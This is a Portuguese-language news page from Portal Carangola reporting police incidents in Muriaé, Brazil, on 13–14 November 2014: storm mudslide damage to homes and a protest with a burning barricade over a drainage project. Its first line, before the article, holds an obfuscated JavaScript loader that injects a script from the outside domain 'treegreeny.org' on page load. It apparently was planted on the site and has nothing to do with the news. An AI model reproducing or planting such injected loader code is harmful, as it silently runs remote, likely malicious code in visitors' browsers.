;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ocorrência policial Muriaé - 14/11/14. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Ocorrência policial Muriaé – 14/11/14.

pmOCORRÊNCIAS DE DESTAQUE MURIAÉ – 14/11/2014

                        76ª CIA PM – MURIAÉ-MG

PM REGISTRA DANOS MATERIAIS EM DIVERSOS PONTOS DA CIDADE OCASIONADOS POR FORTE TEMPORAL EM MURIAÉ

Em 13/11/2014, por volta das 19h, na Rua Silas José de Carvalho, no Bairro Dornelas II, o morador J.E.S., de 36 anos, relatou que uma empreiteira desconhecida realizou um desaterro pelo local e, com as fortes chuvas, grande quantidade de lama desceu em direção a sua residência ocasionando a queda de dois muros de bloco, dano em cerca elétrica e muita sujeira no interior da casa. Outros vizinhos também sofreram danos materiais. A PM esteve no local e orientou os moradores.

Na mesma data, por volta das 20h, na Rua Santa Rita, no Centro, militares depararam com uma aglomeração de pessoas efetuando uma manifestação em virtude dos danos causados pela chuva, os manifestantes reivindicavam providências das autoridades públicas municipais no sentido de sanarem problemas relacionados a uma obra que foi realizada para canalização das águas pluviais e vem causando transtornos aos moradores. No local, havia uma barricada com alguns objetos em chamas, impedindo o trânsito de veículos que vinham da rua SÃO SEBASTIÃO em direção à rua JOSÉ DE ABREU e rua SANTA RITA. Após intensa verbalização com os manifestantes, eles concordaram em encerrarem a manifestação e desobstruíram a via, porém prometeram que amanhã (14/11/14) às 11:00 horas retornarão com o protesto se nenhuma autoridade municipal comparecer ao local com alguma proposta de solução. 

ASSESSORIA DE COMUNICAÇÃO ORGANIZACIONAL DO 47° BPM

RUA JOSÉ DE FREITAS LIMA Nº 47 – BAIRRO SAFIRA

MURIAÉ / MG

TELEFONE: 3696-3275. 3696-3265

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.